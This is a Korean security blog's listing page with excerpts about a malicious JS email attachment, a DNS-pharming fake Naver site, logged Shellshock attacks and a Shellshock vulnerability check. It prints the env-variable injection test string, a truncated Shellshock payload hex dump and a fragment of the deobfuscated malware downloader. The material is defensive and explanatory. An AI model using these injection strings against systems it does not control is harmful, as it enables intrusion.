본문 바로가기

보안10

한국 메일로 유포되는 악성메일 분석 (JS/Obfus.S29) 얼마전부터 제 메일로 이상한 메일이 오고 있습니다.메일 송신자는 제 메일이고제목은 Scan4 / hi prnt 등의 제목이었습니다.그리고 이상한 zip파일이 첨부되어 있었습니다. 그 중 하나의 첨부파일 이름은SCAN004862814.zip압축을풀면 SCAN004862814.js 파일이 생성됩니다.해당 자바스크립트 파일을 실행하면 악성코드가 다운받아져서 실행됩니다. // 원본파일이름 : SCAN004862814.js// 원본파일md5 : 6576cd7c4ba8cb77ce3b23899139c27f// 진단명(Ahnlab) : JS/Obfus.S29 소스가 난독화 되어 있어 복잡하지만 분석하면 간단해집니다. // 실제 동작 소스 if(0){ var ohttp = new ActiveXObject("MSXML2... 2016. 4. 30.
가짜 네이버 사이트 (파밍) 조심하세요! (가짜IP알려드림) 악성코드에 감염되어 DNS조작으로 네이버 주소로 접속하면 가짜 네이버 사이트가 나오는 PC을 보았습니다. 컴퓨터 자체에 악성코드가 설치되어 있었고네트워크의 DNS서버 주소가Primary : 127.0.0.1Second : 8.8.8.8으로 변경되어 있었습니다.악성코드 자체가 DNS서버 역할을 하는거죠... 이 악성코드에 감염되면 네이버 사이트를 접속시23.231.144.66이 IP로 접속하게 됩니다.미국 소속의 IP으로 나오네요. 간단하게 ping을 때려서 이런 IP가 나오면 악성코드에 감염되신 겁니다. 감염되었을시 인터넷 익스플로어로 접속하면 이런게 나옵니다.(크롬은 안나오네요. User-Agent검사를 하나 봅니다) 2015. 12. 11.
지속적인 Bash취약점 공격... 2014.11.08. 19:24 얼마전에 언제나 제작중인;; 홈페이지 서버 네트워크에 IDS/IPS을 구축했는데하루에 한번 이상으로 Bash취약점 공격(CVE-2014-6271)이 들어오고 있네요...아마 무작위 공격 같습니다.뭐 이 외에도 SIP스캔, SSH 취약점, MySQL/MSSQL서버 취약점 공격이 들어오곤 있습니다.뭐 그냥 얼마전에 이슈가 되었던 Bash취약점을 이용한 공격이라서 씁니다. 공격SourceIP는 미국이고Dest는 80포트 입니다.페이로드 0000000: 47 45 54 20 2f 63 67 69 2d 6d 6f 64 2f 69 6e 64 65 78 2e 63 67 69 20 48 54 54 GET./cgi-mod/index.cgi.HTT 000001A: 50 2f 31 2e 30.. 2015. 7. 31.
bash취약점!!! (리눅스·OS X 셸에 중대 보안취약점 발견) 2014.09.27. 00:08 http://www.zdnet.co.kr/news/news_view.asp?artice_id=20140925112954기사 참고하시길 바랍니다. 취약점 패치 여부 확인 방법입니다.https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ Shell에$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" vulnerable 이렇게 입력하고 결과물이 vulnerable this is a test 이렇나오면 취약점이 있는, 패치되지 않은 버전이구요, bash: warning: x.. 2015. 7. 31.
반응형